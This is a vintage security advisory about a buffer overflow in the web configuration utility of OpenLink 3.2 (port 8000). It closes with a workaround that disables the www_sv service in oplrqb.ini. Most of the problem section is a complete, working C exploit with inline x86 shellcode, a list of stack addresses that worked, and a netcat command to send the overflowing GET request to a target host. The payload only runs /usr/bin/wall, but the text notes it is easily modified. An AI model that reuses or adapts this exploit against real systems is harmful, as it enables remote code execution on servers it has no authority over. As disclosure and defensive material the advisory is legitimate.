COMMAND
openlink
SYSTEMS AFFECTED
OpenLink 3.2
PROBLEM
Tymm Twillman found following. A serious security hole has been
found in the web configuration utility that comes with OpenLink
3.2. This hole will allow remote users to execute arbitrary code
as the user id under which the web configurator is run (inherited
from the request broker, oplrqb). The hole is a run-of-the-mill
buffer overflow, due to lack of parameter checking when strcpy()
is used.
OpenLink is a database request broker, used for a generic
interface to different database vendors' products. By default, a
web configuration utility is installed, which runs at port 8000.
For more information, see OpenLink Software's web site at
http://www.openlinksw.com
This exploit has been coded to be benign, and is just for
illustration of the hole in the configuration utility.
Furthermore, it has not been coded for portability (no promises
that it will function if compiled with anything other than
egcs-2.91.66, and it will not compile on a non-x86 compiler).
This works against the linux glibc version of OpenLink 3.2's
configurator. It can easily be modified for other purposes,
however, and there are reasons to believe that the majority, if
not all, platforms are vulnerable to such an attack.
A stack address may be specified on the command line (Tymm had
luck with 0xbffffb65, 0xbffffb85 or 0xbffffbe5). Output of this
should be piped through netcat, e.g.
./oplwall 0xbffffb85 | nc machine.to.hit 8000
The code:
#include <stdio.h>
#include <unistd.h>
/*
* Exploit for Openlink's web configurator for Linux/glibc2
* use: pipe through netcat to openlink web port (8000 default)
* ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
* makes www_sv execute /usr/bin/wall if you hit the address right
*
* For informational purposes only. This was written to show that
* there's a problem, not for skr1pt k1dd33z --.
* don't ask me for help on how to use this to crack systems,
* help compiling or anything else. It will only compile on
* an x86 compiler however.
*
* Addresses that work for me: 0xbffffb65 (initial run of the broker)
* 0xbffffb85 (all consecutive attempts)
* probably tied to process ID www_sv runs as;
* first try PIDs were in triple digits, others
* 4 digit PIDs.
*
* If this works, generally no more www_sv processes will be run as a side effect.
*/
void test() {
__asm__("
jmp doit
exploit:
# code basically from Aleph One's smash stacking article, with
# minor mods
popl %esi
movb $0xd0, %al # Get a / character into %al
xorb $0xff, %al
movb %al, 0x1(%esi) # drop /s into place
movb %al, 0x5(%esi)
movb %al, 0x9(%esi)
xorl %eax,%eax # clear %eax
movb %eax,0xe(%esi) # drop a 0 at end of string
movl %eax,0x13(%esi) # drop NULL for environment
leal 0x13(%esi),%edx # point %edx to environment
movl %esi,0xf(%esi) # drop pointer to argv
leal 0xf(%esi),%ecx # point %ecx to argv
movl %esi,%ebx # point ebx to command - 1
inc %ebx # fix it to point to the right place
movb $0xb,%al # index to execve syscall
int $0x80 # execute it
xorl %ebx,%ebx # if exec failed, exit nicely...
movl %ebx,%eax
inc %eax
int $0x80
doit:
call exploit
.string \"..usr.bin.wall.\"
");
}
char *shellcode = ((char *)test) + 3;
char code[1000];
int main(int argc, char *argv[])
{
int i;
int left;
unsigned char where[] = {"\0\0\0\0\0"} ;
int *here;
char *dummy;
long addr;
if (argc > 1)
addr = strtoul(argv[1], &dummy, 0);
else
addr = 0xbffffb85;
fprintf(stderr, "Setting address to %8x\n", addr);
*((long *)where) = addr;
strcpy(code, shellcode);
for (i = 0; i < 64; i++) {
strcat(code, where);
}
printf("GET %s\n", code);
exit(0);
}
The NT version is vulnerable to a boundary condition as well.
SOLUTION
OpenLink software has been notified of the problem is is
apparently working on a solution. As for workaround, use
following. Disable the www_sv application in oplrqb.ini. By
default there is a section labeled Persistent Services, with the
line "Configurator = www_sv". This section, along with the
entire www_sv section, should be commented out with semicolons,
e.g.
;[Persistent Services]
;Configurator = www_sv
;[www_sv]
;Program = w3config/www_sv
;Directory = w3config
;CommandLine =
;Environment = WWW_SV
;[Environment WWW_SV]
Apparently to complicate issues, OpenLink Software has released a
new "version" of their product, but hasn't updated the version
number. There is also, as far as I can tell, nothing on their
website informing users of this change. Even the filenames are
the same; there are numerous changes however.